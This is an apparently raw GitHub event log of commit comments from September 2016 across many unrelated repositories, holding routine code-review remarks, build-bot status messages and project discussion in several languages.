{"id":"4540743090","type":"CommitCommentEvent","actor":{"login":"ikavalio"},"repo":{"name":"ikavalio/honest-profiler"},"payload":{"comment":{"id":18964779,"position":152,"line":208,"path":"src/main/cpp/concurrent_map.h","commit_id":"52eb3ee3b62b55a4cecb1ffc020e7d1511e88498","created_at":"2016-09-09T15:31:59Z","updated_at":"2016-09-09T15:31:59Z","body":"Spelling "}},"created_at":"2016-09-09T15:31:59Z"}
{"id":"4540746061","type":"CommitCommentEvent","actor":{"login":"pakrym"},"repo":{"name":"aspnet/dotnet-watch"},"payload":{"comment":{"id":18964785,"position":3,"line":2,"path":"src/Microsoft.DotNet.Watcher.Core/project.json","commit_id":"e0663483edb40d36c48ed1b16442635a6e849d51","created_at":"2016-09-09T15:32:29Z","updated_at":"2016-09-09T15:32:29Z","body":"@natemcmaster this might have caused build error: http://aspnetci/viewLog.html?buildId=134616&buildTypeId=UniverseCoherence&tab=buildLog#_focus=5240"}},"created_at":"2016-09-09T15:32:29Z"}
{"id":"4540746155","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18964786,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:32:30Z","updated_at":"2016-09-09T15:32:30Z","body":"https://github.com/LimeSurvey/LimeSurvey/commit/5de3d34fc6c705e2ada74e4da22403337053ef5c"}},"created_at":"2016-09-09T15:32:30Z"}
{"id":"4540755437","type":"CommitCommentEvent","actor":{"login":"ikavalio"},"repo":{"name":"ikavalio/honest-profiler"},"payload":{"comment":{"id":18964809,"position":5,"line":73,"path":"src/main/cpp/profiler.h","commit_id":"52eb3ee3b62b55a4cecb1ffc020e7d1511e88498","created_at":"2016-09-09T15:33:59Z","updated_at":"2016-09-09T15:33:59Z","body":"Don't mix nullptr and NULL. Revert this to NULL"}},"created_at":"2016-09-09T15:33:59Z"}
{"id":"4540761131","type":"CommitCommentEvent","actor":{"login":"Leuyck"},"repo":{"name":"Leuyck/Stand-For-Planet-Earth"},"payload":{"comment":{"id":18964817,"position":null,"line":null,"path":null,"commit_id":"79e74af7b144ab9b45f02967e48473946ed2572e","created_at":"2016-09-09T15:34:56Z","updated_at":"2016-09-09T15:34:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;VSQakmyP&#x2F;77-afficher-les-barres-de-vie-des-joueurs-energie\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Afficher les barres de vie des joueurs + énergie</a>"}},"created_at":"2016-09-09T15:34:56Z"}
{"id":"4540761660","type":"CommitCommentEvent","actor":{"login":"jcredding"},"repo":{"name":"redding/mr"},"payload":{"comment":{"id":18964820,"position":null,"line":null,"path":null,"commit_id":"9f53d30edf29d1f10eccb77b90c36126f69c30a6","created_at":"2016-09-09T15:35:03Z","updated_at":"2016-09-09T15:35:03Z","body":"/cc @kellyredding "}},"created_at":"2016-09-09T15:35:03Z"}
{"id":"4540763023","type":"CommitCommentEvent","actor":{"login":"alex"},"repo":{"name":"yyuu/pyenv"},"payload":{"comment":{"id":18964826,"position":null,"line":null,"path":null,"commit_id":"a0c5fe42e9c47ab555a703abe0f5c3230cdb6081","created_at":"2016-09-09T15:35:18Z","updated_at":"2016-09-09T15:35:18Z","body":"Will there be a tag for this?"}},"created_at":"2016-09-09T15:35:18Z"}
{"id":"4540763194","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18964827,"position":17,"line":41,"path":"backend/globaleaks/handlers/admin/notification.py","commit_id":"3a1319ec27cd448d3a3cd24314f7c16af3885049","created_at":"2016-09-09T15:35:19Z","updated_at":"2016-09-09T15:35:19Z","body":"Good catch @evilaliv3. These lines were not under test coverage were they."}},"created_at":"2016-09-09T15:35:19Z"}
{"id":"4540764854","type":"CommitCommentEvent","actor":{"login":"zeryx"},"repo":{"name":"algorithmiaio/sample-apps"},"payload":{"comment":{"id":18964831,"position":null,"line":null,"path":null,"commit_id":"f681537f777773a6a2c857a5ac59ba98a8f71199","created_at":"2016-09-09T15:35:37Z","updated_at":"2016-09-09T15:35:37Z","body":"I mean 0.5.7*"}},"created_at":"2016-09-09T15:35:37Z"}
{"id":"4540767335","type":"CommitCommentEvent","actor":{"login":"pqarmitage"},"repo":{"name":"pqarmitage/keepalived"},"payload":{"comment":{"id":18964840,"position":null,"line":null,"path":null,"commit_id":"fd44ee51b1d3deab3b2ace8a40bfc6d1f1081b45","created_at":"2016-09-09T15:36:03Z","updated_at":"2016-09-09T15:36:03Z","body":"On Fri, 2016-09-09 at 07:12 -0700, Lorenzo Martinico wrote:\n\n> The VrrpRestarted signal should be declared in the interface file\n> \n\nI've renamed it to VrrpReloaded, meaning the configuration file has been\nreloaded. Since it applies to keepalived as a whole rather than any one\ninstance, it seems to me that it is in the right place. Happy to move it\nif necessary, but at the moment I don't understand why it should be.\n\n\n"}},"created_at":"2016-09-09T15:36:03Z"}
{"id":"4540772803","type":"CommitCommentEvent","actor":{"login":"MatveiKalin"},"repo":{"name":"MatveiKalin/web_project"},"payload":{"comment":{"id":18964849,"position":null,"line":null,"path":null,"commit_id":"fd2699d95691d400b88189d0b78c915df75ae17e","created_at":"2016-09-09T15:36:58Z","updated_at":"2016-09-09T15:36:58Z","body":"На странице с формой входа и регистрации изменен цвет неактивной вкладки."}},"created_at":"2016-09-09T15:36:58Z"}
{"id":"4540773098","type":"CommitCommentEvent","actor":{"login":"Cabodo"},"repo":{"name":"Ludeon/RimWorld-PortugueseBrazilian"},"payload":{"comment":{"id":18964852,"position":null,"line":null,"path":null,"commit_id":"fb01466f4a9ddee20ecbd7e5d97d258cdc34ae98","created_at":"2016-09-09T15:37:00Z","updated_at":"2016-09-09T15:37:00Z","body":"Eu uso o Notepad++, edito, salvo, e publico o arquivo aq no GitHub. No próximo update vai ser adicionado "}},"created_at":"2016-09-09T15:37:00Z"}
{"id":"4540776901","type":"CommitCommentEvent","actor":{"login":"krazedkrish"},"repo":{"name":"rhoit/my-config"},"payload":{"comment":{"id":18964860,"position":null,"line":null,"path":null,"commit_id":"23c7945763e730d246894cbd7fa4ddf4682ce8b4","created_at":"2016-09-09T15:37:39Z","updated_at":"2016-09-09T15:37:39Z","body":"this one works in practical\r\naoe )\r\n        cd /home/krazedkrish/.wine/drive_c/games/AoE2/age2_x1 && wine age2_x1.exe - -opengl -Nostartup  ;;"}},"created_at":"2016-09-09T15:37:39Z"}
{"id":"4540776908","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18964859,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:37:39Z","updated_at":"2016-09-09T15:37:39Z","body":"Yes : you see the not(this) ?\r\n\r\nYou speak for id, i speak for name ....."}},"created_at":"2016-09-09T15:37:39Z"}
{"id":"4540779588","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18964865,"position":null,"line":null,"path":null,"commit_id":"4f276b9d53d81b37cb751a6be284e23406cd3d6a","created_at":"2016-09-09T15:38:07Z","updated_at":"2016-09-09T15:38:07Z","body":"much cleaner, thanks"}},"created_at":"2016-09-09T15:38:07Z"}
{"id":"4540781134","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18964867,"position":null,"line":null,"path":null,"commit_id":"24cbd7c451633dc18415c0ab6b51089d161ac8d3","created_at":"2016-09-09T15:38:22Z","updated_at":"2016-09-09T15:38:22Z","body":"Win64 testing under VS2015 caused this one to fail. It would have failed on other platforms."}},"created_at":"2016-09-09T15:38:22Z"}
{"id":"4540784809","type":"CommitCommentEvent","actor":{"login":"djw432067"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18964877,"position":null,"line":null,"path":null,"commit_id":"bff1c92c8781bfabba3f185ccabe0350684bfbb2","created_at":"2016-09-09T15:38:59Z","updated_at":"2016-09-09T15:38:59Z","body":"Add me Djw43206@gmail.com"}},"created_at":"2016-09-09T15:38:59Z"}
{"id":"4540789364","type":"CommitCommentEvent","actor":{"login":"cikal"},"repo":{"name":"cikal/belajarci"},"payload":{"comment":{"id":18964888,"position":null,"line":null,"path":null,"commit_id":"c9285c27e12c9d6583dcb40946c060c07b8338b7","created_at":"2016-09-09T15:39:47Z","updated_at":"2016-09-09T15:39:47Z","body":"# Point PENTING\r\n\r\n1. Video 01 - Installasi CodeIgniter\r\n\t- Unzip file CI, pada folder server.\r\n    - Seting file `config.php`, `autoload.php`, `database.php`\r\n    - dll\r\n2. Video 02 - Controller\r\n\t- Pembuatan Controller\r\n    - Menggunakan methode `parsing array`\r\n    - Menambah sub-function\r\n    - dll\r\n3. Video 03 - View\r\n\t- Menambah perintah pada `Controller` untuk menampilkan data ke `View`\r\n    - Menggunakan sub-folder pada folder view, dan cara pemanggilannya via Controller.\r\n    - dll\r\n4. Video 04 - Model\r\n\t- Jika Model sering digunakan, kita bisa me-Load nya di `Construct`.\r\n    - Jika Model di Load dari `function` maka Model tersebut hanya bisa digunakan oleh `function` yang berhubungan, tapi jika kita me-Load nya dengan methode `Construct` maka Model tersebut dapat digunakan secara bersamaan oleh semua `function` yang ada didalam satu `Controller`.\r\n    - Catatan :\r\n    \t- Jangan lupa setting file `database.php` sebelum menggunakan Model\r\n        - Jangan lupa me-Load / meng-Construct Model sebelum digunakan\r\n        - Banyak catatan lain, lihat di video.. :coffee: "}},"created_at":"2016-09-09T15:39:47Z"}
{"id":"4540792084","type":"CommitCommentEvent","actor":{"login":"sameg14"},"repo":{"name":"chrisboulton/php-resque"},"payload":{"comment":{"id":18964894,"position":47,"line":102,"path":"lib/Resque/Job/Status.php","commit_id":"5bd7ffb5ea8c7ec02717e19a57b8dbaa0c8d991e","created_at":"2016-09-09T15:40:16Z","updated_at":"2016-09-09T15:40:16Z","body":"These integers should be constants"}},"created_at":"2016-09-09T15:40:16Z"}
{"id":"4540792993","type":"CommitCommentEvent","actor":{"login":"NicolasPetton"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":18964895,"position":38,"line":38,"path":"gulp.el","commit_id":"cbff3b029c7dc850676c288b5cd0d570a1906519","created_at":"2016-09-09T15:40:24Z","updated_at":"2016-09-09T15:40:24Z","body":"Indeed, I missed that. I could rename it to `gulp-task-runner` or something like that."}},"created_at":"2016-09-09T15:40:24Z"}
{"id":"4540794737","type":"CommitCommentEvent","actor":{"login":"trenneman"},"repo":{"name":"trenneman/warper"},"payload":{"comment":{"id":18964898,"position":8,"line":25,"path":"src/main.js","commit_id":"f36d7822a59b5bde39a6b91d8758645bfb9d1642","created_at":"2016-09-09T15:40:40Z","updated_at":"2016-09-09T15:40:40Z","body":"```\r\nimport firebase from 'persistence-plugin-firebase';\r\n\r\nbaseConfig\r\n  .configure({/* baseUrl from plugin */})\r\n  .plugin(firebase({\r\n    apiKey: 'AIzaSyC373ylG9TII68H3Xua_nS2dVI0ihaCgZs',\r\n    authDomain: 'warper.firebaseapp.com',\r\n    databaseURL: 'https://warper.firebaseio.com',\r\n    storageBucket: 'project-313180311630044673.appspot.com'\r\n  });\r\n```"}},"created_at":"2016-09-09T15:40:40Z"}
{"id":"4540797175","type":"CommitCommentEvent","actor":{"login":"taylorturneriv"},"repo":{"name":"taylorturneriv/TEST"},"payload":{"comment":{"id":18964905,"position":1,"line":1,"path":"CONTRIBUTING.md","commit_id":"0bac07e35b8facafde56543bad58b2d21fbac3d6","created_at":"2016-09-09T15:41:07Z","updated_at":"2016-09-09T15:41:07Z","body":"TEST\r\n"}},"created_at":"2016-09-09T15:41:07Z"}
{"id":"4540798860","type":"CommitCommentEvent","actor":{"login":"rdkmaster"},"repo":{"name":"rdkmaster/rdk_test"},"payload":{"comment":{"id":18964911,"position":null,"line":null,"path":null,"commit_id":"8306d9eefb226206993b34c36ec32290f4bec626","created_at":"2016-09-09T15:41:25Z","updated_at":"2016-09-09T15:41:25Z","body":"fixes #2 "}},"created_at":"2016-09-09T15:41:25Z"}
{"id":"4540799052","type":"CommitCommentEvent","actor":{"login":"AdamKniec"},"repo":{"name":"AdamKniec/Codeline"},"payload":{"comment":{"id":18964913,"position":null,"line":null,"path":null,"commit_id":"23ef2f24a2841585701c3a15990af93c19e0a073","created_at":"2016-09-09T15:41:27Z","updated_at":"2016-09-09T15:41:27Z","body":"w"}},"created_at":"2016-09-09T15:41:27Z"}
{"id":"4540802381","type":"CommitCommentEvent","actor":{"login":"selivanov-d"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18964924,"position":4,"line":4,"path":"db/migrate/20160908180036_create_railway_stations_routes.rb","commit_id":"379e875263bdaab53eba6d5fb5f802732c4adaf3","created_at":"2016-09-09T15:42:01Z","updated_at":"2016-09-09T15:42:01Z","body":"`index: true` убрал. Даже не знаю откуда это появилось, т.к. даже в [документации](http://apidock.com/rails/v4.2.1/ActiveRecord/Associations/ClassMethods/belongs_to) об этой опции нет ни слова.\r\n\r\n`null: false` добавил. Без этого, действительно, теоретически возможно создание неполной связи. "}},"created_at":"2016-09-09T15:42:01Z"}
{"id":"4540803783","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18964930,"position":null,"line":null,"path":null,"commit_id":"7d2cf9504c324feb7bd739a368be2ee474ceb98b","created_at":"2016-09-09T15:42:17Z","updated_at":"2016-09-09T15:42:17Z","body":"when user enters a \"new\" ruleset id, rather than just registering it, we now check first. if a ruleset with that id is already registered, we just switch to it. as if the user had clicked on the id in the list\r\n\r\nthis avoids a problem if the user later clicks on the \"enable\" button, which enables the _latest_ version of the ruleset with that id. in the case this change fixes, that would essentially have thrown away the version of the ruleset that was already registered for that id, replacing it with a ruleset stub"}},"created_at":"2016-09-09T15:42:17Z"}
{"id":"4540807183","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18964935,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:42:52Z","updated_at":"2016-09-09T15:42:52Z","body":"in the IRC you said:\r\n\r\n> (17:17:14) shnoulle: I speak for remove LANGUAGECHANGER from header and put it inwelcome.pstpl\r\n\r\nIn the bug report you asked:\r\n\r\n> With multilingual survey : there are 2 times the language dropdow. Because welcome use survey.pstp + welcome.pstpl.\r\nhttps://bugs.limesurvey.org/view.php?id=10956\r\n\r\nBut whatever: Feel free to change whatever you think is needed. "}},"created_at":"2016-09-09T15:42:52Z"}
{"id":"4540815338","type":"CommitCommentEvent","actor":{"login":"brandocalrissian"},"repo":{"name":"18F/federalist"},"payload":{"comment":{"id":18964960,"position":8,"line":13,"path":"assets/app/actions/siteActions.js","commit_id":"e2edd9467187ae4e591fec913ae885ec766448e1","created_at":"2016-09-09T15:44:19Z","updated_at":"2016-09-09T15:44:19Z","body":"Thank you! Will keep an eye out and rebase when the merge happens."}},"created_at":"2016-09-09T15:44:19Z"}
{"id":"4540817324","type":"CommitCommentEvent","actor":{"login":"larshp"},"repo":{"name":"grahamrobbo/teched16_example"},"payload":{"comment":{"id":18964967,"position":null,"line":null,"path":null,"commit_id":"d30cb180eb173fafdc7698d20a69355591f55d7f","created_at":"2016-09-09T15:44:39Z","updated_at":"2016-09-09T15:44:39Z","body":"hi,\r\nthink abapGit fails when trying to import the serialized file, see https://github.com/larshp/abapGit/issues/75"}},"created_at":"2016-09-09T15:44:39Z"}
{"id":"4540817700","type":"CommitCommentEvent","actor":{"login":"schonmann"},"repo":{"name":"schonmann/EDL"},"payload":{"comment":{"id":18964972,"position":null,"line":null,"path":null,"commit_id":"588cab99cb340970e528b4c373457eda48893c05","created_at":"2016-09-09T15:44:43Z","updated_at":"2016-09-09T15:44:43Z","body":"Me empolguei programando e acabei dormindo muito tarde, perdão pela falta. Valeu professor! :)"}},"created_at":"2016-09-09T15:44:43Z"}
{"id":"4540818761","type":"CommitCommentEvent","actor":{"login":"caesarsol"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":18964978,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-09T15:44:53Z","updated_at":"2016-09-09T15:44:53Z","body":"Seems that this change introduced a bug when the project was included as:\r\n\r\n```\r\nimport topojson from 'topojson'\r\n```\r\n\r\nNow it imports `undefined`, I apparently have to include it as:\r\n\r\n```\r\nimport { feature } from 'topojson'\r\n// Or probably\r\nimport * as topojson from 'topojson'\r\n```\r\n\r\nMaybe for the new line in `build/topojson.js`, introduced in version `1.6.27`:\r\n\r\n```\r\nObject.defineProperty(exports, '__esModule', { value: true });\r\n```\r\n\r\nIs that possible?"}},"created_at":"2016-09-09T15:44:53Z"}
{"id":"4540820068","type":"CommitCommentEvent","actor":{"login":"elliottpost"},"repo":{"name":"elliottpost/elliottpost.github.io"},"payload":{"comment":{"id":18964981,"position":null,"line":null,"path":null,"commit_id":"f0a043b336f7125ce0c1305bc815b62151e0b15e","created_at":"2016-09-09T15:45:08Z","updated_at":"2016-09-09T15:45:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;I1SaFYoo&#x2F;27-fellows-directory-search-adjustments-colpm-001\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Fellows Directory search adjustments COLPM-001</a>"}},"created_at":"2016-09-09T15:45:08Z"}
{"id":"4540821995","type":"CommitCommentEvent","actor":{"login":"psilo909"},"repo":{"name":"smarthomeNG/smarthome"},"payload":{"comment":{"id":18964985,"position":null,"line":null,"path":null,"commit_id":"ba7ecf66487a9a1564418f9820970690f22d46b7","created_at":"2016-09-09T15:45:27Z","updated_at":"2016-09-09T15:45:27Z","body":"Well, looks like i again was too stupid to create a PR.. if anyone has problems with this push, please complain!"}},"created_at":"2016-09-09T15:45:27Z"}
{"id":"4540826444","type":"CommitCommentEvent","actor":{"login":"brandocalrissian"},"repo":{"name":"18F/federalist"},"payload":{"comment":{"id":18964998,"position":31,"line":31,"path":"test/client/app/actions/siteActionsTest.js","commit_id":"e2edd9467187ae4e591fec913ae885ec766448e1","created_at":"2016-09-09T15:46:14Z","updated_at":"2016-09-09T15:46:14Z","body":"I'd start with looking at the bits that go together as a coherent chunk of functionality that we can extract. Start with the easy stuff and see what it looks like once we've replaced three or four dependencies with one, however many times we can do that within reason."}},"created_at":"2016-09-09T15:46:14Z"}
{"id":"4540828936","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18965006,"position":null,"line":null,"path":null,"commit_id":"bf4cca7609a52d62b53a6500ec020ce689188b90","created_at":"2016-09-09T15:46:40Z","updated_at":"2016-09-09T15:46:40Z","body":"os_2.0_develop_signal_slot_bug (mbadams5) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bf4cca7609a52d62b53a6500ec020ce689188b90-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bf4cca7609a52d62b53a6500ec020ce689188b90-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T15:46:40Z"}
{"id":"4540831615","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18965012,"position":null,"line":null,"path":null,"commit_id":"ff1a66eeebdd271b756211094def8e72c4567d8e","created_at":"2016-09-09T15:47:11Z","updated_at":"2016-09-09T15:47:11Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=68)"}},"created_at":"2016-09-09T15:47:11Z"}
{"id":"4540837215","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":18965030,"position":null,"line":null,"path":null,"commit_id":"a734f9c0d41f39968d893bbb7207284677700c2b","created_at":"2016-09-09T15:48:12Z","updated_at":"2016-09-09T15:48:12Z","body":"Oops, thanks"}},"created_at":"2016-09-09T15:48:12Z"}
{"id":"4540838910","type":"CommitCommentEvent","actor":{"login":"jyasskin"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":18965036,"position":null,"line":null,"path":null,"commit_id":"befeb4baa86128ea51fc2c7c729b01c2c6ad60c4","created_at":"2016-09-09T15:48:29Z","updated_at":"2016-09-09T15:48:29Z","body":"You can get a border by putting a `<div algorithm>` around the whole algorithm, and then you can also omit the `class=\"algorithm\"` on the `<ol>`. It'd probably be possible to have Bikeshed do that automatically, given the region the `<h3>` covers?"}},"created_at":"2016-09-09T15:48:29Z"}
{"id":"4540838957","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18965038,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:48:29Z","updated_at":"2016-09-09T15:48:29Z","body":"I say in survey.pstpl, noit in startpage.pstpl .....\r\n\r\nYou can want to show : \r\n1. language changer in header : default template\r\n2. language changer in welcome + question page : 2.06 behaviour (survey.pstpl + welcome.pstpl) (bug 10956) : i say in survey.p\r\n3. nowhere in template : only in survey content (any user can want that): for example only in groupdescription of first groupe\r\n\r\nActually only solution 1 work. You say on IRC : it's not a bug because it work with the dfault template ...; OK , LimeSurvey work only with included template .....\r\nUser don't have to upadet template a lot, they just be allowed to update some color ...."}},"created_at":"2016-09-09T15:48:29Z"}
{"id":"4540839261","type":"CommitCommentEvent","actor":{"login":"frankred"},"repo":{"name":"frankred/htmly-kuh"},"payload":{"comment":{"id":18965039,"position":null,"line":null,"path":null,"commit_id":"0870aeb02e1564e8e45079b01675e85b8aa11d83","created_at":"2016-09-09T15:48:32Z","updated_at":"2016-09-09T15:48:32Z","body":"Whut :D ok this repo was just for me. I cloned the htmly repo and changed my remote origin to this repo after I made some changes. This repo will only be used temporally ;) Have a nice weekend @RJacksonm1 "}},"created_at":"2016-09-09T15:48:32Z"}
{"id":"4540846729","type":"CommitCommentEvent","actor":{"login":"varelas"},"repo":{"name":"mvare/vare"},"payload":{"comment":{"id":18965059,"position":3,"line":3,"path":"README.md","commit_id":"9a0adc432b00500e1c1f45f670bd623eacae7b84","created_at":"2016-09-09T15:49:52Z","updated_at":"2016-09-09T15:49:52Z","body":"z"}},"created_at":"2016-09-09T15:49:52Z"}
{"id":"4540847678","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"afxefx/InstallerOpt"},"payload":{"comment":{"id":18965061,"position":30,"line":1577,"path":"main/java/net/fypm/InstallerOpt/Main.java","commit_id":"a8fc8cd45715315131dece5b76bc90303cf8b67f","created_at":"2016-09-09T15:50:03Z","updated_at":"2016-09-09T15:50:03Z","body":"@pylerSM  Shouldn't it be com.google.android.packageinstaller as in 6.0 the package name changed?"}},"created_at":"2016-09-09T15:50:03Z"}
{"id":"4540848120","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/config-file-provider-plugin"},"payload":{"comment":{"id":18965063,"position":null,"line":null,"path":null,"commit_id":"0be7b1f2c3990da0b80764fb10e35727122b8caa","created_at":"2016-09-09T15:50:09Z","updated_at":"2016-09-09T15:50:09Z","body":"Just use the 2.x parent POM and you can delete this kind of stuff."}},"created_at":"2016-09-09T15:50:09Z"}
{"id":"4540848449","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18965066,"position":null,"line":null,"path":null,"commit_id":"6eafd4f2708def19dfc1ba0c1d2c8a44d9e9561f","created_at":"2016-09-09T15:50:13Z","updated_at":"2016-09-09T15:50:13Z","body":"это ненужно"}},"created_at":"2016-09-09T15:50:13Z"}
{"id":"4540851648","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18965082,"position":1,"line":1,"path":"xwiki-platform-core/xwiki-platform-help/xwiki-platform-help-ui/src/main/resources/Help/Translations.fr.xml","commit_id":"9822000a38341c4994dc2de667bcb7ef946abd0a","created_at":"2016-09-09T15:50:45Z","updated_at":"2016-09-09T15:50:45Z","body":"Thanks for fixing it."}},"created_at":"2016-09-09T15:50:45Z"}
{"id":"4540855212","type":"CommitCommentEvent","actor":{"login":"jglick"},"repo":{"name":"jenkinsci/config-file-provider-plugin"},"payload":{"comment":{"id":18965096,"position":null,"line":null,"path":null,"commit_id":"3b3ca9bed058699d2162b2c5cbaa0f498866b46d","created_at":"2016-09-09T15:51:24Z","updated_at":"2016-09-09T15:51:24Z","body":"Better, thanks! BTW there are various ways to (almost-)unit-test this using a `structs` plugin `test`-scoped dependency."}},"created_at":"2016-09-09T15:51:24Z"}
{"id":"4540856925","type":"CommitCommentEvent","actor":{"login":"xtchui"},"repo":{"name":"xtchui/xtc"},"payload":{"comment":{"id":18965100,"position":null,"line":null,"path":null,"commit_id":"769a54442ab590349e3efc3e66f5e1c85a67d766","created_at":"2016-09-09T15:51:42Z","updated_at":"2016-09-09T15:51:42Z","body":"使用说明"}},"created_at":"2016-09-09T15:51:42Z"}
{"id":"4540865723","type":"CommitCommentEvent","actor":{"login":"jogee489"},"repo":{"name":"madvlad/concperfect"},"payload":{"comment":{"id":18965128,"position":null,"line":null,"path":null,"commit_id":"10f36687d25c5f1967e4d0597d8316ab2d5839a5","created_at":"2016-09-09T15:53:21Z","updated_at":"2016-09-09T15:53:21Z","body":"Good job"}},"created_at":"2016-09-09T15:53:21Z"}
{"id":"4540868947","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18965134,"position":null,"line":null,"path":null,"commit_id":"feb82bcc8257ac6e175bf12e8ea5c50f1008274e","created_at":"2016-09-09T15:53:57Z","updated_at":"2016-09-09T15:53:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 978](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13086&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-09T15:53:57Z"}
{"id":"4540868973","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18965135,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-09T15:53:57Z","updated_at":"2016-09-09T15:53:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 979](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13087&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-09T15:53:57Z"}
{"id":"4540871247","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":18965139,"position":null,"line":null,"path":null,"commit_id":"23026252a85d931c2e93678ee5f1cc438ed0ffa5","created_at":"2016-09-09T15:54:22Z","updated_at":"2016-09-09T15:54:22Z","body":"Please also [read this](https://groups.google.com/forum/#!msg/calamares-dev/S2uJ9StqIIg/MR5IBTgoAgAJ) ..."}},"created_at":"2016-09-09T15:54:22Z"}
{"id":"4540871272","type":"CommitCommentEvent","actor":{"login":"fritsch"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18965138,"position":201,"line":959,"path":"xbmc/cores/AudioEngine/Sinks/AESinkWASAPI.cpp","commit_id":"ba4830514e335a21fd79567e670b70707b9ef683","created_at":"2016-09-09T15:54:22Z","updated_at":"2016-09-09T15:54:22Z","body":"Most likely me - when doing (documented) blindly the windows adjustments after the RAW API went in - but no one seemed to have cared."}},"created_at":"2016-09-09T15:54:22Z"}
{"id":"4540875823","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18965149,"position":null,"line":null,"path":null,"commit_id":"f18dbca817026562c83ec2dd00b585754b140f37","created_at":"2016-09-09T15:55:14Z","updated_at":"2016-09-09T15:55:14Z","body":"what I say denis is that the language changer is making problem since at least 2014 (when you were already speaking about the nojs issues with language changer).\r\nThis \"component\" probably need to be rewritten correctly, so it can handle so many instance as we want in a page, as question or as menu. \r\nRefactoring each part of LimeSurvey that need to be refactored wasn't our goal. Our goal was to write a working bootstrap native template. \r\n\r\nSo sorry if we didn't make it universal and working for any template solution: that wasn't the goal. \r\n\r\nNow, you can change whatever you want in the source code to make it easier for your templates to work on it. So precisely to change those kind of things.  \r\n\r\n"}},"created_at":"2016-09-09T15:55:14Z"}
{"id":"4540879634","type":"CommitCommentEvent","actor":{"login":"PhilippSpo"},"repo":{"name":"johanbrook/meteor-publication-collector"},"payload":{"comment":{"id":18965162,"position":null,"line":null,"path":null,"commit_id":"0d61804e6abef6a310e3eb80c4331d8ae8aa22ed","created_at":"2016-09-09T15:55:55Z","updated_at":"2016-09-09T15:55:55Z","body":"👍  I also had this problem when I tried running the tests.."}},"created_at":"2016-09-09T15:55:55Z"}
